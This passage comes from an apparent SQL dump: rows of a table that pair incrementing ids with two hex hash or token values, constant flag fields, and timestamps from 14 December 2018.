(38253, 'f89214136e0cf9e70e2f1cd7916adc4c', '8ad007cf09224cd8', 0, 2, 1, '2018-12-14 05:05:35'),
(38254, '26cfa27ff4c6634839dab30bb94d745c', '1ec75219d7482e28', 0, 2, 1, '2018-12-14 05:06:50'),
(38255, '5dce24d459666569ab4f8aeb1443f9f0', 'a4d9d8225838853d', 0, 2, 1, '2018-12-14 05:07:14'),
(38256, '708fe2b80396c8003277e629e0ffae18', '5a08da7046298e7a', 0, 2, 1, '2018-12-14 05:07:38'),
(38257, '8f8057071424283e30a4930996b40757', '57e1687667bdcb0e', 0, 2, 1, '2018-12-14 05:07:40'),
(38258, 'fceb2323bdbffde71e33c982003e7b95', 'fbf0576065758144', 0, 2, 1, '2018-12-14 05:07:52'),
(38259, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:08:11'),
(38260, 'a59e2c8199ed4fc5669274d00e6f52d7', '21a75882f832ae93', 0, 2, 1, '2018-12-14 05:08:18'),
(38261, '8c695d1800022e75a83b81e799dda1b9', 'd67839a385270e7b', 0, 2, 1, '2018-12-14 05:08:43'),
(38262, 'c9bf705449852c649619c6777a6c5cc9', 'c54421763f3702ea', 0, 2, 1, '2018-12-14 05:08:45'),
(38263, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:09:09'),
(38264, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-14 05:09:53'),
(38265, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-14 05:10:21'),
(38266, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:10:38'),
(38267, 'a6ce09cb25a49dd38bb9a1befe7ddc56', 'c423a976f7958be7', 0, 2, 1, '2018-12-14 05:11:10'),
(38268, 'e6d5b32e620987d56384379c6cbcf313', '553b9f0a18b97af8', 0, 2, 1, '2018-12-14 05:11:13'),
(38269, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:11:13'),
(38270, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:11:26'),
(38271, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-14 05:12:23'),
(38272, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:12:26'),
(38273, 'c8cd2911be30ac98d45acb643ef2266a', '33c0af73ba240498', 0, 2, 1, '2018-12-14 05:12:49'),
(38274, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:13:32'),
(38275, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:14:32'),
(38276, '8d302eecc3264b0e01e17371dc705fe8', 'fccb63434ab0d7c5', 0, 2, 1, '2018-12-14 05:15:17'),
(38277, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:15:48'),
(38278, '8d302eecc3264b0e01e17371dc705fe8', 'fccb63434ab0d7c5', 0, 2, 1, '2018-12-14 05:15:56'),
(38279, '308ec5003093fe5091ba72bfcbada3d9', 'ee048a80ed202af2', 0, 2, 1, '2018-12-14 05:16:19'),
(38280, '9fca2223e3d2a81f4818f9a4ebc96b2a', 'e2c8791634be976d', 0, 2, 1, '2018-12-14 05:17:43'),
(38281, 'be1ad88448886d3427d0d450d503ef33', '9a903552e28cf43c', 0, 2, 1, '2018-12-14 05:18:10'),
(38282, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:18:39'),
(38283, 'c124d5b519a87ea8b07059c3bf8f59f3', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-14 05:18:47'),
(38284, 'be1ad88448886d3427d0d450d503ef33', '9a903552e28cf43c', 0, 2, 1, '2018-12-14 05:19:06'),
(38285, 'b592ece475ea0d788a7711a5d4c98095', '6092d6c1cb041b23', 0, 2, 1, '2018-12-14 05:19:29'),
(38286, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:20:03'),
(38287, '56503309fbb326ae667972fed5c2c1b1', 'fc794f0a80972404', 0, 2, 1, '2018-12-14 05:20:37'),
(38288, 'a59e2c8199ed4fc5669274d00e6f52d7', '21a75882f832ae93', 0, 2, 1, '2018-12-14 05:21:29'),
(38289, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:21:45'),
(38290, '23b63ad63f407f851bb4085730071983', '7501b42c35accff7', 0, 2, 1, '2018-12-14 05:22:02'),
(38291, 'a59e2c8199ed4fc5669274d00e6f52d7', '21a75882f832ae93', 0, 2, 1, '2018-12-14 05:22:03'),
(38292, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-14 05:22:40'),
(38293, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-14 05:25:36'),
(38294, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:25:46'),
(38295, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-14 05:25:49'),
(38296, '4d701975a6f74fd069b6fe4e5a436ce4', '601ff999e03a8543', 0, 2, 1, '2018-12-14 05:26:07'),
(38297, 'cb436613648b908a5555f3382b3536e0', '353e2c8924436e84', 0, 2, 1, '2018-12-14 05:26:15'),
(38298, 'cb436613648b908a5555f3382b3536e0', '353e2c8924436e84', 0, 2, 1, '2018-12-14 05:26:25'),
(38299, '283f01293aede5b9ad0ed233cb1cf414', '9968c5be4a7971a2', 0, 2, 1, '2018-12-14 05:27:48'),
(38300, '9a571656fc0e5ec80cc80c21427f5bee', '68fcde0515352e44', 0, 2, 1, '2018-12-14 05:28:01'),
(38301, '9a571656fc0e5ec80cc80c21427f5bee', '68fcde0515352e44', 0, 2, 1, '2018-12-14 05:28:29'),
(38302, 'a13cde009dd406dabad1b10d26da8930', '04cff4dd1270b50e', 0, 2, 1, '2018-12-14 05:30:06'),
(38303, 'd436d5bfd5ab7a6579f1fcd85e7aa628', '1050858b5c90cf2f', 0, 2, 1, '2018-12-14 05:30:24'),
(38304, '9a571656fc0e5ec80cc80c21427f5bee', '68fcde0515352e44', 0, 2, 1, '2018-12-14 05:30:32'),
(38305, 'd436d5bfd5ab7a6579f1fcd85e7aa628', '1050858b5c90cf2f', 0, 2, 1, '2018-12-14 05:30:42'),
(38306, '7e0e186901899f2095921cd5a482d8da', 'fad7ef00226341cb', 0, 2, 1, '2018-12-14 05:31:03'),
(38307, '9a571656fc0e5ec80cc80c21427f5bee', '68fcde0515352e44', 0, 2, 1, '2018-12-14 05:31:09'),
(38308, '9a571656fc0e5ec80cc80c21427f5bee', '68fcde0515352e44', 0, 2, 1, '2018-12-14 05:31:24'),
(38309, '3a5a7061c0b9766a682b0fee15aab7d5', 'dace6e0c219330fc', 0, 2, 1, '2018-12-14 05:31:59'),
(38310, 'e0d1793af5ed807716dc95078f5edc61', 'f8d002c7b8b76490', 0, 2, 1, '2018-12-14 05:34:08'),
(38311, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:34:45'),
(38312, '7214612366c515f8d1eb933bc11a8acc', 'bb3464a656ac2271', 0, 2, 1, '2018-12-14 05:34:51'),
(38313, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:34:57'),
(38314, 'b592ece475ea0d788a7711a5d4c98095', '6092d6c1cb041b23', 0, 2, 1, '2018-12-14 05:35:01'),
(38315, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:35:15'),
(38316, '8f8057071424283e30a4930996b40757', '57e1687667bdcb0e', 0, 2, 1, '2018-12-14 05:35:23'),
(38317, '062dcb1fac3b455d14d80af434d90a8d', 'df27b9a2919a8206', 0, 2, 1, '2018-12-14 05:35:24'),
(38318, 'c9bf705449852c649619c6777a6c5cc9', 'c54421763f3702ea', 0, 2, 1, '2018-12-14 05:35:26'),
(38319, '708fe2b80396c8003277e629e0ffae18', '5a08da7046298e7a', 0, 2, 1, '2018-12-14 05:35:32'),
(38320, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:35:44'),
(38321, '02148d63fdbbeeca2e0e1835d8ec2b12', 'cad202a09758cb3a', 0, 2, 1, '2018-12-14 05:35:47'),
(38322, 'c124d5b519a87ea8b07059c3bf8f59f3', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-14 05:35:49'),
(38323, 'a6ce09cb25a49dd38bb9a1befe7ddc56', 'c423a976f7958be7', 0, 2, 1, '2018-12-14 05:35:49'),
(38324, 'd30971ed4c06b03c5630aea427f5d4f9', '9ead839ed439c136', 0, 2, 1, '2018-12-14 05:35:51'),
(38325, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-14 05:36:01'),
(38326, 'b592ece475ea0d788a7711a5d4c98095', '6092d6c1cb041b23', 0, 2, 1, '2018-12-14 05:36:09'),
(38327, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:36:09'),
(38328, '3a5a7061c0b9766a682b0fee15aab7d5', 'dace6e0c219330fc', 0, 2, 1, '2018-12-14 05:36:17'),
(38329, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:36:21'),
(38330, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:36:22'),
(38331, '02148d63fdbbeeca2e0e1835d8ec2b12', 'cad202a09758cb3a', 0, 2, 1, '2018-12-14 05:36:25'),
(38332, '062dcb1fac3b455d14d80af434d90a8d', 'df27b9a2919a8206', 0, 2, 1, '2018-12-14 05:36:28'),
(38333, '8d185e420edc58c5e6a3c92fe1974a07', 'ef6156a3302fba73', 0, 2, 1, '2018-12-14 05:36:34'),
(38334, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:36:43'),
(38335, '5dce24d459666569ab4f8aeb1443f9f0', 'a4d9d8225838853d', 0, 2, 1, '2018-12-14 05:36:43'),
(38336, '062dcb1fac3b455d14d80af434d90a8d', 'df27b9a2919a8206', 0, 2, 1, '2018-12-14 05:36:46'),
(38337, '708fe2b80396c8003277e629e0ffae18', '5a08da7046298e7a', 0, 2, 1, '2018-12-14 05:36:48'),
(38338, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:36:59'),
(38339, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:36:59'),
(38340, 'e89f95990af02c99a2c4017c8dcbfd95', '4c07673592205f17', 0, 2, 1, '2018-12-14 05:37:05'),
(38341, '8773ecd5f41f13676d01c893eb6ac672', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-14 05:37:07'),
(38342, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:37:10'),
(38343, '8f8057071424283e30a4930996b40757', '57e1687667bdcb0e', 0, 2, 1, '2018-12-14 05:37:12'),
(38344, '0001e244274db9ac8776cea217b661a5', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-14 05:37:13'),
(38345, '4d701975a6f74fd069b6fe4e5a436ce4', '601ff999e03a8543', 0, 2, 1, '2018-12-14 05:37:18'),
(38346, '062dcb1fac3b455d14d80af434d90a8d', 'df27b9a2919a8206', 0, 2, 1, '2018-12-14 05:37:20'),
(38347, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-14 05:37:21'),
(38348, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-12-14 05:37:23'),
(38349, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:37:26'),
(38350, '02148d63fdbbeeca2e0e1835d8ec2b12', 'cad202a09758cb3a', 0, 2, 1, '2018-12-14 05:37:35'),
(38351, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:37:39'),
(38352, '308ec5003093fe5091ba72bfcbada3d9', 'ee048a80ed202af2', 0, 2, 1, '2018-12-14 05:37:46'),
(38353, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:37:49'),
(38354, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:37:55'),
(38355, '283f01293aede5b9ad0ed233cb1cf414', '9968c5be4a7971a2', 0, 2, 1, '2018-12-14 05:37:55'),
(38356, '56438f964d0e60441a173af24498c884', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-14 05:37:59'),
(38357, '776852568acf4c0e138a5a07724b23d6', '32b169e936bbe5df', 0, 2, 1, '2018-12-14 05:38:07'),
(38358, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:38:10'),
(38359, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:38:10'),
(38360, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:38:11'),
(38361, 'c124d5b519a87ea8b07059c3bf8f59f3', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-14 05:38:12'),
(38362, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:38:21'),
(38363, '5dce24d459666569ab4f8aeb1443f9f0', 'a4d9d8225838853d', 0, 2, 1, '2018-12-14 05:38:30'),
(38364, '062dcb1fac3b455d14d80af434d90a8d', 'df27b9a2919a8206', 0, 2, 1, '2018-12-14 05:38:31'),
(38365, 'f89214136e0cf9e70e2f1cd7916adc4c', '8ad007cf09224cd8', 0, 2, 1, '2018-12-14 05:38:32'),
(38366, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:38:33'),
(38367, '02148d63fdbbeeca2e0e1835d8ec2b12', 'cad202a09758cb3a', 0, 2, 1, '2018-12-14 05:38:33'),
(38368, '23b63ad63f407f851bb4085730071983', '7501b42c35accff7', 0, 2, 1, '2018-12-14 05:38:34'),
(38369, 'c124d5b519a87ea8b07059c3bf8f59f3', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-14 05:38:34'),
(38370, 'e6d5b32e620987d56384379c6cbcf313', '553b9f0a18b97af8', 0, 2, 1, '2018-12-14 05:38:44'),
(38371, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:38:44'),
(38372, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:38:46'),
(38373, '062dcb1fac3b455d14d80af434d90a8d', 'df27b9a2919a8206', 0, 2, 1, '2018-12-14 05:38:53'),
(38374, '776852568acf4c0e138a5a07724b23d6', '32b169e936bbe5df', 0, 2, 1, '2018-12-14 05:39:00'),
(38375, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:39:00'),
(38376, '4d701975a6f74fd069b6fe4e5a436ce4', '601ff999e03a8543', 0, 2, 1, '2018-12-14 05:39:00'),
(38377, '5dce24d459666569ab4f8aeb1443f9f0', 'a4d9d8225838853d', 0, 2, 1, '2018-12-14 05:39:04'),
(38378, '02148d63fdbbeeca2e0e1835d8ec2b12', 'cad202a09758cb3a', 0, 2, 1, '2018-12-14 05:39:05'),
(38379, '46468445d0b834968e4e69379cf825e0', '8a144e5fc2e94311', 0, 2, 1, '2018-12-14 05:39:18'),
(38380, 'bf21389e185d0acd038eddf1ffbac39e', 'd253aa15f0650852', 0, 2, 1, '2018-12-14 05:39:19'),
(38381, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:39:23'),
(38382, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:39:24'),
(38383, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:39:27'),
(38384, 'c124d5b519a87ea8b07059c3bf8f59f3', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-14 05:39:32'),
(38385, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:39:38'),
(38386, '5dce24d459666569ab4f8aeb1443f9f0', 'a4d9d8225838853d', 0, 2, 1, '2018-12-14 05:39:39'),
(38387, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:39:41'),
(38388, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:40:05'),
(38389, '16348f6a4aacc2b9bcc54d778fd4fb68', '4bc1bfd1f90e68e5', 0, 2, 1, '2018-12-14 05:40:06'),
(38390, 'f00c54729e589da8bbb89154f75e360f', 'df673342c2c2d34b', 0, 2, 1, '2018-12-14 05:40:10'),
(38391, 'b592ece475ea0d788a7711a5d4c98095', '6092d6c1cb041b23', 0, 2, 1, '2018-12-14 05:40:15'),
(38392, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:40:15'),
(38393, '062dcb1fac3b455d14d80af434d90a8d', 'df27b9a2919a8206', 0, 2, 1, '2018-12-14 05:40:19'),
(38394, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:40:28'),
(38395, 'c124d5b519a87ea8b07059c3bf8f59f3', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-14 05:40:36'),
(38396, 'd436d5bfd5ab7a6579f1fcd85e7aa628', '1050858b5c90cf2f', 0, 2, 1, '2018-12-14 05:40:37'),
(38397, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:40:37'),
(38398, 'e89f95990af02c99a2c4017c8dcbfd95', '4c07673592205f17', 0, 2, 1, '2018-12-14 05:40:42'),
(38399, '23b63ad63f407f851bb4085730071983', '7501b42c35accff7', 0, 2, 1, '2018-12-14 05:40:43'),
(38400, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:40:52'),
(38401, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:41:05'),
(38402, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:41:05'),
(38403, '0001e244274db9ac8776cea217b661a5', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-14 05:41:05'),
(38404, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:41:05'),
(38405, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:41:12'),
(38406, '308ec5003093fe5091ba72bfcbada3d9', 'ee048a80ed202af2', 0, 2, 1, '2018-12-14 05:41:14'),
(38407, '308ec5003093fe5091ba72bfcbada3d9', 'ee048a80ed202af2', 0, 2, 1, '2018-12-14 05:41:23'),
(38408, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:41:27'),
(38409, 'be1ad88448886d3427d0d450d503ef33', '9a903552e28cf43c', 0, 2, 1, '2018-12-14 05:41:32'),
(38410, 'bf21389e185d0acd038eddf1ffbac39e', 'd253aa15f0650852', 0, 2, 1, '2018-12-14 05:41:36'),
(38411, '308ec5003093fe5091ba72bfcbada3d9', 'ee048a80ed202af2', 0, 2, 1, '2018-12-14 05:41:37'),
(38412, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:41:44'),
(38413, 'a7056f2f07ed6c2c322e39c6cac205ec', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-14 05:41:50'),
(38414, 'f89214136e0cf9e70e2f1cd7916adc4c', '8ad007cf09224cd8', 0, 2, 1, '2018-12-14 05:41:53'),
(38415, 'da20a3fe5335e07e0095a8656986b90c', '8808a790852da147', 0, 2, 1, '2018-12-14 05:41:56'),
(38416, '23b63ad63f407f851bb4085730071983', '7501b42c35accff7', 0, 2, 1, '2018-12-14 05:42:03'),
(38417, '7e0e186901899f2095921cd5a482d8da', 'fad7ef00226341cb', 0, 2, 1, '2018-12-14 05:42:05'),
(38418, '8d302eecc3264b0e01e17371dc705fe8', 'fccb63434ab0d7c5', 0, 2, 1, '2018-12-14 05:42:08'),
(38419, '9fca2223e3d2a81f4818f9a4ebc96b2a', 'e2c8791634be976d', 0, 2, 1, '2018-12-14 05:42:12'),
(38420, 'c124d5b519a87ea8b07059c3bf8f59f3', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-14 05:42:20'),
(38421, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2018-12-14 05:42:20'),
(38422, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:42:31'),
(38423, '23b63ad63f407f851bb4085730071983', '7501b42c35accff7', 0, 2, 1, '2018-12-14 05:42:34'),
(38424, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2018-12-14 05:42:41'),
(38425, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:42:42'),
(38426, '62308260fe8306382631673a16afae87', 'e216e7808556cb4e', 0, 2, 1, '2018-12-14 05:42:44'),
(38427, '9fca2223e3d2a81f4818f9a4ebc96b2a', 'e2c8791634be976d', 0, 2, 1, '2018-12-14 05:42:45'),
(38428, 'f391bddafa1b620393f7f4a7fe8eaff5', 'afa4f258bef590a2', 0, 2, 1, '2018-12-14 05:42:45'),
(38429, '154c89a9f98a9832c411033f976d46a9', '5a883dd79dd2a20d', 0, 2, 1, '2018-12-14 05:42:47'),
(38430, '23b63ad63f407f851bb4085730071983', '7501b42c35accff7', 0, 2, 1, '2018-12-14 05:42:51'),
(38431, 'f391bddafa1b620393f7f4a7fe8eaff5', 'afa4f258bef590a2', 0, 2, 1, '2018-12-14 05:42:53'),
(38432, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:43:01'),
(38433, '3a5a7061c0b9766a682b0fee15aab7d5', 'dace6e0c219330fc', 0, 2, 1, '2018-12-14 05:43:06'),
(38434, 'b592ece475ea0d788a7711a5d4c98095', '6092d6c1cb041b23', 0, 2, 1, '2018-12-14 05:43:08'),
(38435, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:43:16'),
(38436, 'e78b0ebeeecd882b426b6dc4c98cf203', '8e5b43ff6ea202a4', 0, 2, 1, '2018-12-14 05:43:25'),
(38437, '5dce24d459666569ab4f8aeb1443f9f0', 'a4d9d8225838853d', 0, 2, 1, '2018-12-14 05:43:26'),
(38438, '515c4346f16c52cc3ce083beec7e683e', '503a514a8daa32a7', 0, 2, 1, '2018-12-14 05:43:44'),
(38439, '776852568acf4c0e138a5a07724b23d6', '32b169e936bbe5df', 0, 2, 1, '2018-12-14 05:43:48'),
(38440, '26cfa27ff4c6634839dab30bb94d745c', '1ec75219d7482e28', 0, 2, 1, '2018-12-14 05:43:48'),
(38441, 'b592ece475ea0d788a7711a5d4c98095', '6092d6c1cb041b23', 0, 2, 1, '2018-12-14 05:44:11'),
(38442, 'c124d5b519a87ea8b07059c3bf8f59f3', 'c69b16a8ac60521f', 0, 2, 1, '2018-12-14 05:44:17'),
(38443, '23b63ad63f407f851bb4085730071983', '7501b42c35accff7', 0, 2, 1, '2018-12-14 05:44:19'),
(38444, 'e89f95990af02c99a2c4017c8dcbfd95', '4c07673592205f17', 0, 2, 1, '2018-12-14 05:44:46'),
(38445, '738435ca418b621ffcbefa75941e98d7', 'c0d620ee8725a926', 0, 2, 1, '2018-12-14 05:44:59'),
(38446, '154c89a9f98a9832c411033f976d46a9', '5a883dd79dd2a20d', 0, 2, 1, '2018-12-14 05:46:30'),
(38447, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-14 05:47:31'),
(38448, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-14 05:47:37'),
(38449, '591eb6513f6045077e2bd6c7bb206ec4', 'b7423205212a38ad', 0, 2, 1, '2018-12-14 05:48:46'),
(38450, 'f7d39e88e87a0be94d3d7cbafdc0e496', '5d05c790f4830fad', 0, 2, 1, '2018-12-14 05:48:53'),
(38451, 'f89214136e0cf9e70e2f1cd7916adc4c', '8ad007cf09224cd8', 0, 2, 1, '2018-12-14 05:49:08'),
(38452, '0395d8b57c1db39c4123956f95696c1b', 'f2150f4c5b5418ea', 0, 2, 1, '2018-12-14 05:49:31'),
(38453, '755cea7c80a5665fa95b800327f71d71', '4ad2bae2476c07d2', 0, 2, 1, '2018-12-14 05:49:40'),
(38454, '5bebf437c4588039587a9c53c1c9e653', '05e75d206acd435b', 0, 2, 1, '2018-12-14 05:49:55'),
(38455, '23a5973878050ddb3b1740a3af1c4179', '4033acf80dbe370e', 0, 2, 1, '2018-12-14 05:49:58'),
(38456, '5bebf437c4588039587a9c53c1c9e653', '05e75d206acd435b', 0, 2, 1, '2018-12-14 05:50:03'),
(38457, '0395d8b57c1db39c4123956f95696c1b', 'f2150f4c5b5418ea', 0, 2, 1, '2018-12-14 05:50:17'),
(38458, '755cea7c80a5665fa95b800327f71d71', '4ad2bae2476c07d2', 0, 2, 1, '2018-12-14 05:50:39'),
(38459, '755cea7c80a5665fa95b800327f71d71', '4ad2bae2476c07d2', 0, 2, 1, '2018-12-14 05:51:01'),
(38460, 'c9bf705449852c649619c6777a6c5cc9', 'c54421763f3702ea', 0, 2, 1, '2018-12-14 05:51:12'),
(38461, '755cea7c80a5665fa95b800327f71d71', '4ad2bae2476c07d2', 0, 2, 1, '2018-12-14 05:51:31'),
(38462, '84232fd39d745e800c3f8a104f3766a2', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-14 05:51:49'),
(38463, '48e5ebbb1a4b6ecbb8f0a24e617c3d9b', 'b53e985da0a7d5bd', 0, 2, 1, '2018-12-14 05:52:47'),
(38464, '7e0e186901899f2095921cd5a482d8da', 'fad7ef00226341cb', 0, 2, 1, '2018-12-14 05:52:51'),
(38465, 'fad0e55b5c0a0626485c58024b842b6a', '4b59db0988947dfc', 0, 2, 1, '2018-12-14 05:52:59'),
(38466, 'bb47ac8f450e5560a9cdc44b03cfc434', '3588180e6471bbc2', 0, 2, 1, '2018-12-14 05:53:57'),
(38467, '170adf61ce5aeb96300099c71a13eaf8', '7829c95e3f09f30f', 0, 2, 1, '2018-12-14 05:54:32'),
(38468, '26cfa27ff4c6634839dab30bb94d745c', '1ec75219d7482e28', 0, 2, 1, '2018-12-14 05:55:38'),
(38469, 'b508f0bdee211da94ecb9f0a275d2834', '332d3419d504f496', 0, 2, 1, '2018-12-14 05:56:07'),
(38470, '01b1a4b3446bb806ba93da255a38bd95', '02d96c2f02c4a227', 0, 2, 1, '2018-12-14 05:56:13'),
(38471, 'b508f0bdee211da94ecb9f0a275d2834', '332d3419d504f496', 0, 2, 1, '2018-12-14 05:56:37'),
(38472, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-14 05:56:56'),
(38473, '8ffcd3f7812ae2450ead84f7a004d144', '7e7b8558fe1fccd3', 0, 2, 1, '2018-12-14 05:57:26'),
(38474, '6918999b77536a0703c428a6567ac197', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-14 05:57:40'),
(38475, 'a6ce09cb25a49dd38bb9a1befe7ddc56', 'c423a976f7958be7', 0, 2, 1, '2018-12-14 05:57:59'),
(38476, '5bebf437c4588039587a9c53c1c9e653', '05e75d206acd435b', 0, 2, 1, '2018-12-14 05:58:02'),
(38477, '708fe2b80396c8003277e629e0ffae18', '5a08da7046298e7a', 0, 2, 1, '2018-12-14 05:58:36'),
(38478, 'b433575d8721772b39a33778426374e9', 'af497c25dcff81bf', 0, 2, 1, '2018-12-14 05:58:47'),
(38479, '7456be3aef308496cc7edf346f320724', '049dbeed11095c77', 0, 2, 1, '2018-12-14 05:59:06'),
(38480, '327519161b4d5ab1f02c0c35471a1477', 'fcaa3c8d44082e09', 0, 2, 1, '2018-12-14 05:59:29'),
